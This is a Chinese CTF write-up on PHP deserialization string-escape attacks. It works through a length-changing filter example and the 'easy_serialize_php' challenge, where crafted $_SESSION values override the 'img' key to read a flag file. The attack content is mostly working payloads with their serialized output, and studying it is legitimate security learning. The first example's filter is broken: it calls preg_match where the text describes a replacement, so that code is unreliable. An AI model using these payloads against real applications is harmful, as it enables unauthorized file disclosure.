分析

PHP 在反序列化时,对类中不存在的属性也会进行反序列化

这个点很神奇,

例题一

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
function filter($string){
return preg_match('/x/','yy',$string);
}

$username = "peri0d";
$password = "aaaaa";
$user = array($username, $password);

var_dump(serialize($user));
echo '\n';

$r = filter(serialize($user));

var_dump($r);
echo '\n';

var_dump(unserialize($r));

这里将 x 替换为 yy,也就是变长了,正常的序列化数据为

1
a:2:{i:0;s:6:"peri0d";i:1;s:5:"aaaaa";}

如果我们可以控制用户名去修改密码,那么应该是这样的

1
a:2:{i:0;s:6:"peri0d";i:1;s:6:"123456";}";i:1;s:5:"aaaaa";}

(尤其注意这里的双引号)

peri0d 长度为6,";i:1;s:6:"123456";} 长度为20

x替换为yy,长度由原来的1变为2,那么我们这里设填充为z,满足

6+20+z = 6+2z,得到的z就是20,所以填充x为20即可

1
2
3
4
5
6
7
8
9
10
11
12
$username = "peri0d";
$payload = '";i:1;s:6:"123456";}';
$x = str_repeat("x",20);
$username = $username.$x.$payload;
$password = "aaaaa";
$user = array($username, $password);
$r = filter(serialize($user));

var_dump($r);
echo '\n';

var_dump(unserialize($r));

结果

1
2
3
4
5
6
7
8
"a:2:{i:0;s:46:"peri0dyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy";i:1;s:6:"123456";}";i:1;s:5:"aaaaa";}"

array(2) {
[0] =>
string(46) "peri0dyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy"
[1] =>
string(6) "123456"
}

例题二

安洵杯 easy_serialize_php

代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
 <?php

$function = @$_GET['f'];

function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}


if($_SESSION){
unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}

flag 在 d0g3_f1ag.php 这个文件中

$_SESSION 数组中有 user, funciton, img 这三个属性

最后读文件的文件名是 $_SESSION['img'] ,如果能够控制这个属性就好了,但是

1
2
3
4
5
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

显然 sha1 的数据你是没法控制的,那怎么搞呢

重点在这里

1
$serialize_info = filter(serialize($_SESSION));

序列化之后经过了一次过滤

extract($_POST); 使得我们可以控制 $_SESSION 数组中的 userfunction

先测试一下正常的一段序列化字符:

1
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:4:"2333";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZwo=";}

能不能控制好user和function,使得加上一个我们控制好的img

1
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:4:"2333";s:3:"img";s:20:"ZDBnM19mMWFnLnBocAo=";s:2:"dd";s:3:"aaa";};s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZwo=";}

这样反序列化的时候最后的那个 img属性就是多余的了,我们来计算一下怎么利用过滤来达到目的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
$_SESSION['user'] = '2333';
$_SESSION['function'] = 'a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocAo=";s:2:"dd";s:3:"aaa";}';
$_SESSION['img'] = 'Z3Vlc3RfaW1nLnBuZwo=';

$a = filter(serialize($_SESSION));

var_dump(filter(serialize($_SESSION)));
// var_dump(unserialize($a));

此时生成的是

1
a:3:{s:4:"user";s:4:"2333";s:8:"function";s:61:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocAo=";s:2:"dd";s:3:"aaa";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZwo=";}

我们要让 ";s:8:"function";s:61:"a 这段字符被吃掉,成为 user 的值,算一下长度24,正好是6个flag

所以

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
$_SESSION['user'] = 'flagflagflagflagflagflag';
$_SESSION['function'] = 'a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocAo=";s:2:"dd";s:3:"aaa";}';
$_SESSION['img'] = 'Z3Vlc3RfaW1nLnBuZwo=';

$a = filter(serialize($_SESSION));

var_dump(filter(serialize($_SESSION)));
var_dump(unserialize($a));

这时候得到的结果

1
a:3:{s:4:"user";s:24:"";s:8:"function";s:61:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocAo=";s:2:"dd";s:3:"aaa";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZwo=";}

再进行反序列化

1
2
3
4
5
6
7
8
array(3) {
'user' =>
string(24) "";s:8:"function";s:61:"a"
'img' =>
string(20) "ZDBnM19mMWFnLnBocAo="
'dd' =>
string(3) "aaa"
}

可以看到成功地覆盖了img属性

ps,又测试了一下如果有两个img属性会怎么搞

1
2
3
$_SESSION['user'] = 'flagflagflagflagflagflag';
$_SESSION['function'] = 'a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocAo=";s:3:"img";s:3:"aaa";}';
$_SESSION['img'] = 'Z3Vlc3RfaW1nLnBuZwo=';

得到的结果是:

1
2
3
4
5
6
array(2) {
'user' =>
string(24) "";s:8:"function";s:62:"a"
'img' =>
string(3) "aaa"
}

此时img属性被合并了